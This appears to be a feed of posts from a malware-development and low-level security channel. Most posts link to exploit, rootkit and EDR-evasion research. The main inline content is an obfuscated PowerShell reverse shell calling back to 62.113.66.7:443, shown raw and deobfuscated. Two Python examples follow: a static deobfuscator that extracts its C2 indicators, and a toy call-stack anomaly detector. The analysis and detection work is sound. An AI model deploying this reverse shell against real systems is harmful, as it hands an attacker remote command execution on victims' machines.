#malware_development #maldev #hooking
@ZwLowLevel
https://github.com/kas-sec/version.dll-sideloading.git
GitHub
GitHub - kas-sec/version.dll-sideloading: sideloading PoC using onedrive.exe & version.dll
Forwarded from Golden Byte
#kernel_exploit #ps5 #binary_exploitation
@ZwLowLevel
https://github.com/MeisterLone/no_ctrl
#rootkit #linux_kernel #evasive_malware
@ZwLowLevel
https://www.synacktiv.com/en/publications/linkpro-ebpf-rootkit-analysis
Synacktiv
LinkPro: eBPF rootkit analysis
#apple_exploit #macos #malware
@ZwLowLevel
https://pberba.github.io/security/2025/11/11/macos-infection-vector-applenoscript-bypass-gatekeeper/
pepe berba
MacOS Infection Vector: Using AppleScripts to bypass Gatekeeper
A look at how threat actors are abusing AppleScript .scpt files to deliver macOS malware, from fake documents to browser update lures, and how these scripts ...
#hardware_hacking #iot
@ZwLowLevel
https://hackmag.com/security/gadgets-howto-3
HackMag
Home IoT Device Teardown and Analysis: A Complete Guide to Hardware Hacking
No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE
#binary_exploitation #exploitation #aslr_bypass #rop_chain #rce
@ZwLowLevel
https://modzero.com/en/blog/no-leak-no-problem/
Modzero
How a Catch-22 Breaks AMD SEV-SNP
(ACM CCS 2025)
#amd #sev_snp #os_internals
@ZwLowLevel
https://rmpocalypse.github.io/rmpocalypse-CCS2025.pdf
RMPocalypse Attack
${1}='62'+'.113'+'.66'+'.7';${2}=4*100+43;${3}='Ne'+'t.'+'Soc'+'ket'+'s.'+'Tcp'+'Cli'+'ent';${4}=new-object ${3}(${1},${2});${5}=${4}.GetStream();[byte[]]${6}=0..(8*1024-1)|%{0};while((${7}=${5}.Read(${6},0,${6}.Length)) -ne 0){${8}=[System.Text.Encoding]::ASCII.GetString(${6},0,${7});${9}=([System.Management.Automation.PowerShell]::Create()).AddScript(${8}).Invoke()|Out-String 2>&1|out-string;${10}=[System.Text.Encoding]::ASCII.GetBytes(${9});${5}.Write(${10},0,${10}.Length);${5}.Flush()};${4}.Close()
Now deobfuscated:
$ip = "62.113.66.7"    # C2 address, rebuilt from the '62'+'.113'+'.66'+'.7' fragments
$port = 443            # 4*100+43
$client = New-Object Net.Sockets.TcpClient($ip, $port)    # outbound TCP connection to the C2
$stream = $client.GetStream()
[byte[]]$buffer = 0..8191 | ForEach-Object { 0 }          # 8 KiB receive buffer
while (($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
    # whatever the operator sends is treated as a script and run in a fresh PowerShell runspace
    $command = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $bytesRead)
    $result = ([System.Management.Automation.PowerShell]::Create()).AddScript($command).Invoke() | Out-String
    # output is sent back over the same socket: a plain TCP reverse shell on 443
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($result)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Flush()
}
$client.Close()
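The sample only uses two cheap tricks: splitting literals into 'a'+'b' fragments and hiding integers behind constant arithmetic. Both fold mechanically, so the C2 host and port can be recovered without ever running the script. The following Python is an added example (not the channel's code, and not a general PowerShell deobfuscator); it embeds the one-liner above as its sample input, folds the concatenations and arithmetic, renames the ${N} variables, and then resolves the arguments of the new-object call through the constant table. The regexes and the $vN naming are this example's own assumptions.

```python
import ast
import re

# The obfuscated one-liner from the post, embedded as the sample input for this script.
SAMPLE = (
    "${1}='62'+'.113'+'.66'+'.7';${2}=4*100+43;${3}='Ne'+'t.'+'Soc'+'ket'+'s.'+'Tcp'+'Cli'+'ent';"
    "${4}=new-object ${3}(${1},${2});${5}=${4}.GetStream();[byte[]]${6}=0..(8*1024-1)|%{0};"
    "while((${7}=${5}.Read(${6},0,${6}.Length)) -ne 0){${8}=[System.Text.Encoding]::ASCII.GetString(${6},0,${7});"
    "${9}=([System.Management.Automation.PowerShell]::Create()).AddScript(${8}).Invoke()|Out-String 2>&1|out-string;"
    "${10}=[System.Text.Encoding]::ASCII.GetBytes(${9});${5}.Write(${10},0,${10}.Length);${5}.Flush()};${4}.Close()"
)

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")          # 'a'+'b'
_ARITH = re.compile(r"\b\d+(?:\s*[*+\-]\s*\d+)+\b")          # 4*100+43, 8*1024-1
_PAREN_NUM = re.compile(r"\((\d+)\)")                        # (8191) -> 8191
_VAR = re.compile(r"\$\{(\d+)\}")                            # ${7} -> $v7
_ASSIGN = re.compile(r"\$v(\d+)=('[^']*'|\d+)(?=;|\s|$)")    # $vN=<string or int literal>
_NEWOBJ = re.compile(r"new-object\s+(\$v\d+)\(([^)]*)\)", re.IGNORECASE)


def fold_strings(src: str) -> str:
    """Merge adjacent literal pairs until a fixed point: 'Ne'+'t.'+'Soc' -> 'Net.Soc'."""
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
    return src


def _safe_int_eval(expr: str) -> int:
    """Evaluate +, - and * over integer literals only; never eval() attacker-controlled text."""
    def ev(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Sub, ast.Mult)):
            left, right = ev(node.left), ev(node.right)
            if isinstance(node.op, ast.Add):
                return left + right
            if isinstance(node.op, ast.Sub):
                return left - right
            return left * right
        raise ValueError("unsupported expression: " + expr)
    return ev(ast.parse(expr, mode="eval").body)


def fold_arith(src: str) -> str:
    """Replace constant arithmetic with its value and drop the parentheses that only wrapped it."""
    src = _ARITH.sub(lambda m: str(_safe_int_eval(m.group(0))), src)
    return _PAREN_NUM.sub(r"\1", src)


def rename_vars(src: str) -> str:
    """${N} is legal PowerShell but unreadable; use $vN so assignments can be tracked by name."""
    return _VAR.sub(lambda m: "$v" + m.group(1), src)


def deobfuscate(src: str) -> str:
    return rename_vars(fold_arith(fold_strings(src)))


def extract_iocs(src: str) -> dict:
    """Resolve the constructor arguments of the new-object call through the constant table,
    so the C2 host, port and .NET type fall out without executing anything."""
    clean = deobfuscate(src)
    consts = {}
    for m in _ASSIGN.finditer(clean):
        lit = m.group(2)
        consts["$v" + m.group(1)] = int(lit) if lit.isdigit() else lit.strip("'")
    m = _NEWOBJ.search(clean)
    if not m:
        return {}
    resolve = lambda tok: consts.get(tok.strip(), tok.strip())
    args = [resolve(a) for a in m.group(2).split(",")]
    return {"type": resolve(m.group(1)), "host": args[0], "port": args[1]}


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(extract_iocs(SAMPLE))
```

The arithmetic is evaluated through Python's ast with only integer constants and +, -, * allowed, so the folder cannot be turned into a code-execution primitive by a crafted sample; anything outside that grammar raises instead of being guessed at.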
@ZwLowLevel
Stack frame anomalies can be observed when the Detours library is used to implement user-land hooks. Here the hook is placed on MessageBoxW, which is unrealistic for what security vendors do in practice; in a real deployment, EDRs place sensors that monitor calls to the native (Nt*) functions in a variety of contexts, for example:
Process injection functions:
NtOpenProcess
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtCreateThreadEx
Mapping section objects into memory:
NtCreateSection
NtMapViewOfSection
NtUnmapViewOfSection
@ZwLowLevel
In short, although security vendors use a variety of sensors to collect telemetry in an environment, hooking remains today a powerful method for identifying an anomalous call stack.
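What "anomalous call stack" means in practice is easier to see on concrete frames. The following Python is an added example, not the channel's code and not any vendor's sensor logic: a toy classifier over call stacks captured at the moment a hook on one of the Nt* functions listed above fires. The stacks, module names and the three heuristics (native resolved outside ntdll, a return address into unbacked memory, a monitored native called straight from a non-system module) are this example's own assumptions; a real sensor would symbolise live return addresses and tune these rules against far more telemetry.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Frame:
    module: Optional[str]  # image backing the return address; None = unbacked (private) memory
    symbol: str            # nearest symbol, "" when unresolved


# The natives named in the post, grouped as there.
INJECTION_NATIVES = {"NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtCreateThreadEx"}
SECTION_NATIVES = {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"}
MONITORED = INJECTION_NATIVES | SECTION_NATIVES

# Modules expected directly above ntdll on a legitimate Win32 path (assumption for this toy).
WRAPPER_MODULES = {"ntdll.dll", "kernelbase.dll", "kernel32.dll"}


def parse_stack(dump: str) -> List[Frame]:
    """Parse one frame per line, innermost first. 'module!symbol' is an image-backed frame;
    a bare address (0x...) is a return address that no loaded image claims."""
    frames = []
    for line in dump.strip().splitlines():
        line = line.strip()
        if "!" in line:
            module, symbol = line.split("!", 1)
            frames.append(Frame(module.lower(), symbol))
        else:
            frames.append(Frame(None, ""))
    return frames


def analyse(stack: List[Frame]) -> List[str]:
    """Return the reasons a stack captured inside a hook on a monitored native looks anomalous.
    An empty list means nothing was flagged."""
    if not stack or stack[0].symbol not in MONITORED:
        return ["hook fired on a function outside the monitored set"]
    reasons = []
    if stack[0].module != "ntdll.dll":
        reasons.append(f"{stack[0].symbol} resolved in {stack[0].module}, not ntdll.dll (copied ntdll or own syscall stub)")
    for i, frame in enumerate(stack[1:], start=1):
        if frame.module is None:
            reasons.append(f"frame {i} returns into unbacked memory (shellcode, manually mapped PE or a trampoline)")
    caller = stack[1] if len(stack) > 1 else None
    if caller and caller.module and caller.module not in WRAPPER_MODULES:
        reasons.append(f"{stack[0].symbol} called directly from {caller.module}, skipping the Win32 wrapper")
    return reasons


# Constructed stacks for the example, not real captures.
LEGIT = """
ntdll.dll!NtAllocateVirtualMemory
kernelbase.dll!VirtualAlloc
app.exe!main
kernel32.dll!BaseThreadInitThunk
ntdll.dll!RtlUserThreadStart
"""

UNBACKED_CALLER = """
ntdll.dll!NtAllocateVirtualMemory
kernelbase.dll!VirtualAlloc
0x000001f4a3c40120
kernel32.dll!BaseThreadInitThunk
ntdll.dll!RtlUserThreadStart
"""

DIRECT_NATIVE = """
ntdll.dll!NtWriteVirtualMemory
injector.exe!DoInject
injector.exe!main
kernel32.dll!BaseThreadInitThunk
ntdll.dll!RtlUserThreadStart
"""


if __name__ == "__main__":
    for name, dump in (("legit", LEGIT), ("unbacked", UNBACKED_CALLER), ("direct", DIRECT_NATIVE)):
        print(name, analyse(parse_stack(dump)) or "clean")
```

The unbacked-frame rule is the one that catches the Detours artifact the post mentions: a trampoline lives in memory that belongs to no loaded image, so a stack that passes through it shows a return address the loader cannot attribute, exactly like shellcode would.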
This project demonstrates CodeDefender's ability to obfuscate kernel and bootloader files. The modified system includes obfuscated critical system functions and bypassed security mechanisms.
#low_level #windows_kernel #windows_internals #uefi #bootloader
@ZwLowLevel
https://github.com/codedefender-io/windows
#loader #crypter #edr_bypass #malware #ppl
@ZwLowLevel
https://www.elastic.co/security-labs/roningloader
www.elastic.co
RONINGLOADER: DragonBreath’s New Path to PPL Abuse — Elastic Security Labs
Elastic Security Labs uncovers RONINGLOADER, a multi-stage loader deploying DragonBreath’s updated gh0st RAT variant. The campaign weaponizes signed drivers, thread-pool injection, and PPL abuse to disable Defender and evade Chinese EDR tools.
#xbox360 #os_internals #debugging #low_level
@ZwLowLevel
https://randomascii.wordpress.com/2018/01/07/finding-a-cpu-design-bug-in-the-xbox-360/
Random ASCII - tech blog of Bruce Dawson
Finding a CPU Design Bug in the Xbox 360
The recent reveal of Meltdown and Spectre reminded me of the time I found a related design bug in the Xbox 360 CPU – a newly added instruction whose mere existence was dangerous. Back in 2005 I was…
#macos #ios #reverse_engineering #reversing
@ZwLowLevel
https://hexai.re/blog/reversing-swift-like-a-pro